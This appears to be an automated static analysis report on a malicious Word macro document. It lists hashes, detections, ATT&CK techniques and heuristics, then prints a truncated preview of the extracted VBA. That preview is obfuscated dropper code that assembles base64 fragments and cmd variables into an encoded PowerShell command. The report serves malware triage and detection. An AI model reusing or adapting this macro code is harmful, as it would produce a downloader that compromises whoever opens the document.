Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 db4633d43e42ed36…

MALICIOUS

Office (OLE)

86.0 KB Created: 2017-11-01 11:31:00 Authoring application: Microsoft Office Word First seen: 2017-11-13
MD5: c6b84491ce3b662087c37a9c51c424d1 SHA-1: 3b75927a2bae1a13fe60766cc8e53176fa80c0d3 SHA-256: db4633d43e42ed3662323acec76c23dedb66dc2dafef35d0f70a49106b01c59c
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing VBA macros. The AutoOpen macro triggers a Shell() call, which is highly suspicious. This indicates the document is designed to download and execute a second-stage payload, likely leveraging the embedded macros.bas file.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6362992-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6362992-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 44794 bytes
SHA-256: 63c9350f44486041d25011b23ab6407a6fba5bab4ca1395118d643d7a391e4f0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 58 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "URvlaIznq"
Function ZHWHpPwwi()
SkKMEpNrb = QKXIViOjO
UUtpwQmCJmZ = Mid("QbsziqxADEAMQAsADkAOAAsACAAMQAwADYALAAgADEAS34qbdG8oXkrc8qjc9b7GS", 7, 37)
oAJZXN = UUtpwQmCJmZ
DaqwfJsch = NZqnaViZm
DErqcZiqV = Mid("5VNdCRzUj9QAwADUALAAxADAAOAAgACwAMQAwADEAIAAsADQAMAAsACAAMwA2ACAALAAxADEANwAsADEAMQA0ACAALAAgADEAMAA4AOJLcK3nnaoQ0", 11, 92)
ihBUuWWa = DErqcZiqV
lTsnuicXu = dwFHLBzBa
EijGKWo = Mid("WZjWLcsHalCJdm6wmDEAIAAsACAAOQA4ACTHJawd8ApGrmi1Qw", 18, 17)
YRwjE = EijGKWo
wTEAUcHzS = ldjCawwcM
LswwI = Mid("aE4vHjaqCDtn8R4mU6U8QROAbp7wcAfhZxADEANgAsACAANQA5ACAALAAzADYAIAAsAqRM", 34, 34)
JDHiYt = LswwI
VQjMWHPOj = cFNpqZulG
ZBYaQ = Mid("TcatCAO9sNXt1QXaYB6UMACwAOQA3ACAALAAxADEANgAsACAAMQAwADQALAAzADIAIAAsADYAMQAgACwAIAAzADIALAAzADYAIAAsADEAMAAxACAALAAgADEAMQAwACwAMQAxADgAIAAsADUAOAAsADEAMQA2ACwAMQAwADEAIAAsACAAMQAwADkALAAgADEAMQAyACAALAAgADMAMgAgACNf9HuOwntp", 22, 194)
AKzEm = ZBYaQ
hlzPfuLqu = KbVJLiobl
YqoOzsA = Mid("AEAMAAxACwANQA5ACwAIAAxADIANQAsADEAMgA1ACkAIAB8ACUAIAB7ACAAKABbAEMASABBAFIAXQBbAGkAbgBUAF0AJABfACkAfQAgACkAKQB8AC4AKAAgACQARQBOAFYAOgBwAFUAYgBsAGkAYwBbADEAMmo1Tu5i898065jcw7CvpSiBNDTIHjb", 2, 155)
HXKokF = YqoOzsA
ukzwlGwfu = EwmKIopOr
JjtrUClcuz = Mid("6GGDlNwAgACwAIAAxADEAMwAsACAAOAA3ACAALAA3ADIALAAgADcAOAAsACAANwA3ACAALAAgADcANAAsACAAOQAwACAALAA0ADcAIAAsADQANAAgACwAMQAwADQALAAxADEANgAsACAAMQAxADYAIAAsADEAMQAyACwdihc0jCjXwL8RjdQL8Fu", 6, 158)
Qtjzz = JjtrUClcuz
NGkmAfNEm = KSufAOoAB
EmTow = Mid("uPUzFITEwmjHbs3CMaFs8uvj%!!%SVQEWNZTm%! -e WwBzAHQAUgBpAE4ARwBdADoAOgBKAG8AaQBOACgAJwAnACAAwXkEpAi9wKUL79FY", 22, 70)
FTFSVCZRfz = EmTow
JlzsTzzGu = HASjTzraV
HKEhi = Mid("MAAgADEAMAA2ACwAMQAwADEAIAAsADkAOQAsADEAMQA2ACAALAAzADIALAAgAhiR4mw7dabcihwJI2XwS", 2, 60)
sWXXzVzPVZB = HKEhi
AIjRjjTlN = AZwYWInjd
Ajhhlw = Mid("pzGdQKGTdocBcd3ahMEANgAsADEAMQA0ACwAMQAyADEAIAAsACAAMQAyADMALAAgADMANgAgACwAMQAxADkALAAxADAAMQAsACAAOQA4ACwAIAA5ADkAIAAsADEAMAA4ACwAMQAwADUAIAAsADEAMAAxACAALAAxADEAMAAsACAAfIdv3o8qlzcob2GcSj", 19, 154)
vjPVWIY = Ajhhlw
rUmkmtlGE = UdwzoZtns
ZUpHZ = Mid("YlAjFOIDEAMQA0ACwAIAA5ADcAIAAsACAAMQAxADAAIAAsACAAMQAwADAAIAAsADEAMiL88zjfD5419t1s2avIwojN", 8, 60)
jtYXmFzC = ZUpHZ
RrCSZimzh = wjiKtnUzF
aHwAicirKm = Mid("IaLnmzaWjmJ4Z5T5DJ8ViMFset %ibXMDDuvj%=wers&&set %DXGlzQqzP%=ptiNFKMKj&&set %ZHWHpPwwi%=po&&set %hNDTNtjJD%=wXwfWVsWw&&set %SVQEWNZTm%=hell&&set %2MU7j", 24, 123)
RzNLpN = aHwAicirKm
jPVpjcczI = ODkWiiQVp
IYYwCcdYOSV = Mid("fWf6Bnz8hrzCMDgANwAsACAAOAAzACAALAAgADkAOQAgACwAMQAxADQAIAAsACAAMQAwADUALAAxADEAMgAsADEAMQA2ACwAIAA0ADYALAA4ADMALAAxADAANAAshkw", 14, 111)
qoPJY = IYYwCcdYOSV
bYvDwmLmX = aJjLdoUKX
ITVuS = Mid("22zDYPuuOBDshsE6oRAROnjwcHWEnEB%=EbqZhLEBn&&!%ZHWHpPwwi%!!%ibXMDDVULYzYBaEB3LpD0w5", 23, 43)
WSmKJzzcfr = ITVuS
WcKZqZaYw = wcEvuXwta
DFGHa = Mid("jTIjwciLqIAAsACAAOQA3ACAALAAgADEAMQA1ACwAIAAxADEANgAsADEAMAA1ACAALAAgADkANwAsAjGTvWroq", 10, 69)
rwMGXD = DFGHa
KfRjdtFBq = YDavCUKtt
wtoKaQh = Mid("WlhCAAMQAxADAAIAAsACAAMQAwADQAIAAsACAAMQAxADEALAAxADAAM1Wvv6q63Ph", 4, 52)
jiZpFErA = wtoKaQh
iBiVdapPK = TfOMMjOJf
TkLfUtQjJ = Mid("dCoBRa59wANAAzACwAMwAyACAALAAzADkAIAAsADkAMgAgACwAIAAzADkALAAgADMAMgAszHG", 9, 62)
UoObDhjoIR = TkLfUtQjJ
GmwQUojBU = WAZjkAiUr
ktzDPTpHK = Mid("NPfK0WIDLAMQAxADAALAAxADAAMQAgACwAMQAxADkAIAAsADQANQAgACwAIAAoCjj", 10, 52)
EZXijFisjSY = ktzDPTpHK
soBrtOjlW = bMrqhspEH
sIVvbtjlw = Mid("hXYTT284zDQhjwT16DwcPrYACMAAxACwAOQA5ACwAIAAxADEANgAsADMAMgAgACwAIAA0ADUALAA2ADcAIAAsADEkER8SbNTXnPIS", 26, 63)
vVwQlPTwL = sIVvbtjlw
uNhtlbFTO = kjuNhssVV
GfNbcOLQtzG = Mid("ziIA8bt3TDmBaocIImJ3DX0ADEALAA0ADQAIAAsADMAMgAsACAAMwA2ACwAIAAxADEAMgAgACwAOQA3ACwAIAAxADEANgAsADEAMAA0ACAALAA0ADEApqtwdJiCFn", 23, 92)
VEKqUw = GfNbcOLQtzG
dOtkhiRIp = djThtftjG
wjjzq = Mid("SPCAALAAgADQANgAsACAAOAA0ACwAIAAxADEAMQAgACwAIAA4ADMAHtksSci19fApO9", 3, 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.